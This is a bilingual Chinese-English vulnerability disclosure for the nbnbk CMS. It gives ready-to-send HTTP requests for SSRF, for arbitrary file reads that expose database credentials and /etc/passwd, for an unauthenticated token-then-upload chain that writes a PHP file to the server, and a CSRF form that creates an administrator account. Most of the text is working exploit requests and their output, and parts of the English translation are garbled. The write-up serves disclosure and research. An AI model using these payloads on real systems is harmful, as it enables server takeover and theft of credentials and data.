nbnbk 存在SSRF漏洞

SSRF vulnerability in nbnbk

0x00 前言 Preface

该漏洞可以伪装服务器发送请求，但没有回显，危害较小，可以做为 DDOS 使用。

漏洞存在版本：default

This bug can disguise the server from sending requests, but it does not echo and is less harmful and can be used as a DDOS.

Vulnerability Existing Version: default

0x01 漏洞复现 Vulnerability Reproduction

POST /api/Image/curl_upload_image HTTP/1.1
Host: nbnbk:8888
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

url=http://127.0.0.1:8088&file[tmp_name]=1&file[type]=1&file[name]=1

替换 url 来进行 SSRF 攻击，该漏洞没有回显。发送请求后可以看到服务器已经向外请求了。
Replace url for `SSRF'attack, the vulnerability is not echoed. After sending the request, you can see that the server has already made an outgoing request.

nbnbk 存在任意文件读取

Nbnbk has an arbitrary file read vulnerability

POST /api/Index/getFileBinary HTTP/1.1
Host: nbnbk:8888
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

url=../application/database.php

通过修改 url 参数来读取文件，来看返回数据。
Return data by modifying the url parameter to read the file.

HTTP/1.1 200 OK
Date: Fri, 04 Mar 2022 03:39:37 GMT
Server: Apache/2.4.46 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod_wsgi/3.5 Python/2.7.13
X-Powered-By: PHP/7.4.21
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
Content-Length: 2784
Connection: close
Content-Type: text/html; charset=UTF-8

{"code":0,"msg":"操作成功","data":"PD9waHAKLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBUaGlua1BIUCBbIFdFIENBTiBETyBJVCBKVVNU\r\nIFRISU5LIF0KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBDb3B5cmlnaHQgKGMpIDIwMDZ+MjAxNiBo\r\ndHRwOi8vdGhpbmtwaHAuY24gQWxsIHJpZ2h0cyByZXNlcnZlZC4KLy8gKy0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0K\r\nLy8gfCBMaWNlbnNlZCAoIGh0dHA6Ly93d3cuYXBhY2hlLm9yZy9saWNlbnNlcy9MSUNFTlNFLTIu\r\nMCApCi8vICstLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tCi8vIHwgQXV0aG9yOiBsaXUyMXN0IDxsaXUyMXN0QGdtYWls\r\nLmNvbT4KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\r\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCi8vIOaVsOaNruW6k+mFjee9ruaWh+S7tgoKcmV0dXJu\r\nIFsKICAgIC8vIOaVsOaNruW6k+exu+WeiwogICAgJ3R5cGUnICAgICAgICAgICA9PiAnbXlzcWwn\r\nLAogICAgLy8g5pyN5Yqh5Zmo5Zyw5Z2ACiAgICAnaG9zdG5hbWUnICAgICAgID0+ICcxMjcuMC4w\r\nLjEnLAogICAgLy8g5pWw5o2u5bqT5ZCNCiAgICAnZGF0YWJhc2UnICAgICAgID0+ICduYm5iaycs\r\nCiAgICAvLyDnlKjmiLflkI0KICAgICd1c2VybmFtZScgICAgICAgPT4gJ3Jvb3QnLAogICAgLy8g\r\n5a+G56CBCiAgICAncGFzc3dvcmQnICAgICAgID0+ICdwYXNzQCExMjMnLAogICAgLy8g56uv5Y+j\r\nCiAgICAnaG9zdHBvcnQnICAgICAgID0+ICc4ODg5JywKICAgIC8vIOi\/nuaOpWRzbgogICAgJ2Rz\r\nbicgICAgICAgICAgICA9PiAnJywKICAgIC8vIOaVsOaNruW6k+i\/nuaOpeWPguaVsAogICAgJ3Bh\r\ncmFtcycgICAgICAgICA9PiBbXSwKICAgIC8vIOaVsOaNruW6k+e8lueggem7mOiupOmHh+eUqHV0\r\nZjgKICAgICdjaGFyc2V0JyAgICAgICAgPT4gJ3V0ZjgnLAogICAgLy8g5pWw5o2u5bqT6KGo5YmN\r\n57yACiAgICAncHJlZml4JyAgICAgICAgID0+ICdmbF8nLAogICAgLy8g5pWw5o2u5bqT6LCD6K+V\r\n5qih5byPCiAgICAnZGVidWcnICAgICAgICAgID0+IGZhbHNlLAogICAgLy8g5pWw5o2u5bqT6YOo\r\n572y5pa55byPOjAg6ZuG5Lit5byPKOWNleS4gOacjeWKoeWZqCksMSDliIbluIPlvI8o5Li75LuO\r\n5pyN5Yqh5ZmoKQogICAgJ2RlcGxveScgICAgICAgICA9PiAwLAogICAgLy8g5pWw5o2u5bqT6K+7\r\n5YaZ5piv5ZCm5YiG56a7IOS4u+S7juW8j+acieaViAogICAgJ3J3X3NlcGFyYXRlJyAgICA9PiBm\r\nYWxzZSwKICAgIC8vIOivu+WGmeWIhuemu+WQjiDkuLvmnI3liqHlmajmlbDph48KICAgICdtYXN0\r\nZXJfbnVtJyAgICAgPT4gMSwKICAgIC8vIOaMh+WumuS7juacjeWKoeWZqOW6j+WPtwogICAgJ3Ns\r\nYXZlX25vJyAgICAgICA9PiAnJywKICAgIC8vIOaYr+WQpuS4peagvOajgOafpeWtl+auteaYr+WQ\r\npuWtmOWcqAogICAgJ2ZpZWxkc19zdHJpY3QnICA9PiB0cnVlLAogICAgLy8g5pWw5o2u6ZuG6L+U\r\n5Zue57G75Z6LIGFycmF5IOaVsOe7hCBjb2xsZWN0aW9uIENvbGxlY3Rpb27lr7nosaEKICAgICdy\r\nZXN1bHRzZXRfdHlwZScgPT4gJ2FycmF5JywKICAgIC8vIOaYr+WQpuiHquWKqOWGmeWFpeaXtumX\r\ntOaIs+Wtl+autQogICAgJ2F1dG9fdGltZXN0YW1wJyA9PiBmYWxzZSwKICAgIC8vIOaYr+WQpumc\r\ngOimgei\/m+ihjFNRTOaAp+iDveWIhuaekAogICAgJ3NxbF9leHBsYWluJyAgICA9PiBmYWxzZSwK\r\nICAgIC8v5Y+W5raI5YmN5Y+w6Ieq5Yqo5qC85byP5YyWCiAgICAnZGF0ZXRpbWVfZm9ybWF0Jz0+\r\nIGZhbHNlLApdOwo=\r\n"}

文件信息在 data 字段中，是 base64 编码的格式，但其中包含了大量的 \r\n 导致我们没法直接解码。我们可以通过 js 去将所有 \r\n 删掉。

1. 打开 Google Chrome 游览器
2. 打开一个控制台
3. 输入以下代码

The file information in the data field is in the base64 encoded format, but it contains a large number of \r\n which prevents us from decoding it directly. We can delete all \r\n'through js'.

1. Open Google Chrome Tour
2. Open a console
3. Enter the following code

a = "$data string"
a.replaceAll('\r\n', '')

演示将上面代码进行转化
The demonstration transforms the above code

将转化后的数据进行 base64 转码 我使用的是 Google Chrome 插件 FeHelper
Transcoding the converted data base64 I'm using the Google ChromePlug-inFeHelper

nbnbk 存在任意文件上传 Getshell

Nbnbk has any file upload Getshell

0x00 前言 Preface

该漏洞无需账号密码即可任意文件上传 Getshell，相当于两步请求直接获取机器权限。

漏洞存在版本：default

This vulnerability allows any file to be uploaded to the Getshell without an account password, which is equivalent to two-step requests for direct access to the machine.

Vulnerability Existing Version: default

0x01 漏洞复现 Vulnerability Reproduction

1.获取 token

文件上传的接口需要 access_token ，我们可以通过下面这个接口获取

Get token

The interface for file upload requires access_ Token, we can get it from this interface

POST /api/login/wx_login HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Connection: close

openid=1&unionid=1&sex=1&head_img=1&nickname=1

可以在返回包中发现 token 已经生成
You can find that token has been generated in the return package

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2022 01:37:25 GMT
Server: Apache/2.4.46 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod_wsgi/3.5 Python/2.7.13
X-Powered-By: PHP/7.4.21
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
Content-Length: 831
Connection: close
Content-Type: text/html; charset=UTF-8

{"code":0,"msg":"登录成功","data":{"id":10,"parent_id":0,"invite_code":"","mobile":"","email":"","nickname":"1","user_name":"u10","pay_password":0,"head_img":"1","sex":1,"birthday":"1990-01-01","money":"0.00","commission":"0.00","commission_available":"0.00","consumption_money":"0.00","frozen_money":"0.00","point":0,"user_rank":0,"user_rank_points":0,"address_id":0,"openid":"1","unionid":"1","refund_account":"","refund_name":"","signin_time":0,"group_id":50,"status":0,"add_time":1646141434,"update_time":1646141434,"delete_time":0,"login_time":1646185046,"reciever_address":null,"collect_goods_count":0,"bonus_count":0,"status_text":"正常","sex_text":"男","user_rank_text":null,"token":{"id":15,"token":"87b5fd1230df78dad5a62924426a9a6d","type":2,"user_id":10,"data":"","expire_time":1648733458,"add_time":1646141458}}}

2.在 vps 中启动 http 服务

Start HTTP service in VPS

echo '<?php phpinfo();' > index.php
python -m http.server 8099

3.文件上传

File Upload

POST /api/User/download_img HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close

access_token=87b5fd1230df78dad5a62924426a9a6d&url=http://127.0.0.1:8099/index.php&path=info.php

这里的 access_token 就是上面获取的 token，url 是文件地址，path 是文件名
Access_here Token is the token obtained above, URL is the file address, path is the file name.

返回 200 表示成功，我们直接访问 http://nbnbk:8888/info.php 可以看到已经写入文件并能成功解析。

Back to 200 means success, we visit directly http://nbnbk:8888/info.php You can see that the file has been written and parsed successfully.

0x02 漏洞分析

Vulnerability Analysis

1.发现危险函数

Discover danger function

通过全局搜索 fopen 这个打开文件的函数，发现了 api 下面存在一个 path 用变量来控制，极有肯能存在问题。
By searching fopen, an open file function globally, we found that there is a path under the API that is controlled by variables, which is probably problematic.

双击后可以发现是一个 download_img 的函数，其中 url 和 path 变量是可控的。
Double-click to find a download_ Function of img where url and path variables are controllable.

这里直接使用 curl 访问了我们提供的 url 并且 path 也没有做任何过滤。直接读文件写到指定目录。
Curl is used directly here to access the url'we provided and path` does not filter at all. Read the file directly to the specified directory.

直接构造路近请求但是提示 token 错误，下一步我们需要获得 token。
Construct the approach request directly but prompt token error, we need to get token next.

2.获取token

Get token

看源码可以知道，一定是要登陆才能调用到 getToken 。可以通过注册登陆的方式来获取，但是如果关闭了注册功能、注册功能失效，我们就没法获取 token 了。有没有不需要有账号密码即可获取 token 的方式？

我们继续来看登陆功能的 Login.php 发现提供了一种不需要账号密码就可以登陆的方式。

Looking at the source code, you know that you must be logged in to call getToken'. It can be obtained by registering for login, but if the registration function is turned off and the registration function is invalid, we will not be able to get token'. Is there a way to get `token'without an account password?

Let's move on to Login'for login functionality. PhpDiscovery provides a way to log in without an account password.

进一步跟进 wxLogin 函数
Follow Up wxLogin Function

1. 折叠函数里包含了输入内容的校验，大概意思是用户不存在可以创建一个新的，这里我们可以不用管。
2. 通过了校验之后会生成新的 token

1.The collapse function contains a check of the input content, which probably means that the user does not exist and can create a new one, which we can ignore here.

2.New `token'will be generated after passing the check

我们直接构造数据包，填入需要的字段即可直接拿到生成的 token。到这里分析就结束了。

We construct the data package directly and fill in the required fields to get the generated token. The analysis is over here.

A Server-Side Request Forgery (SSRF) in getFileBinary function of nbnbk cms allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter.

Vulnerable code in /application/api/controller/Index.php

    /**
     * 文件转Base64二进制流
     * @param $url 网络文件路径，绝对地址
     * @return string
     */
    public function getFileBinary()
    {
        $str = file_get_contents($_REQUEST['url']);
        Util::echo_json(ReturnData::create(ReturnData::SUCCESS,chunk_split(base64_encode($str))));
    }

Vulnerability PoC

GET /api/Index/getFileBinary?url=http://172.16.119.1:8181/flag.txt HTTP/1.1
Host: 172.16.119.130
Connection: close

The effect of the exploit is shown in the following figure. A remote attacker can force the application to make arbitrary requests via the injection of arbitrary URLs into the url parameter.

A remote attacker can also read arbitrary file information from the target system.

PoC

GET /api/Index/getFileBinary?url=file:///etc/passwd HTTP/1.1
Host: 172.16.119.130
Connection: close

After decoding the data field of the HTTP response body in base64, you can get the specific content of the file (/etc/passwd)

nbnbk 存在 CSRF 添加后台用户

CSRF Add Background User in nbnbk

该漏洞可以通过 CSRF 的方式，无需知道管理员账号密码进入后台，即可在没有痕迹的添加管理员账户。
漏洞存在版本：default

This vulnerability can be accessed via CSRF to add an administrator account without knowing the administrator account password to the background.

Vulnerability Existing Version: default

具体实现

Specific implementation

http://nbnbk:8888/fladmin/login

通过打开 /fladmin/login 路径进入后台登陆界面
Enter the background login interface by opening/fladmin/login path

使用默认密码 admin888/123456 进入后台，找到用户管理列表里的 “管理员” 界面中的 “添加管理员” 功能点
Use the default password admin888/123456 to enter the background and find the Add Administrator function point in the Administrator interface in the User Management List

随意输入用户名和密码，点击保存。
Enter your username and password at will and click Save.

在 bp 查看请求数据包，然后通过 bp 生成 CSRF POC 代码。

复制后在本地新建文件，通过 python -m http.server 8099 开启本地的 web 服务。

View the request packet in BP and generate the CSRF POC code from bp.

Create a new file locally after copying, via python-m http. Server 8099 Opens a local web service.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://nbnbk:8888/fladmin/admin/add" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="name" value="admin" />
      <input type="hidden" name="pwd" value="123456" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="role&#95;id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

点击 submit request 提交请求
Click submit request to submit the request

点击后提示添加成功
Hint to add success after clicking

查看我们的请求数据包
View our request packet

Origin 和 referer 是我们自己的服务。CSRF 添加管理员账号报告到此结束。
Origin and referer are our own services. This concludes the CSRF Add Administrator Account report.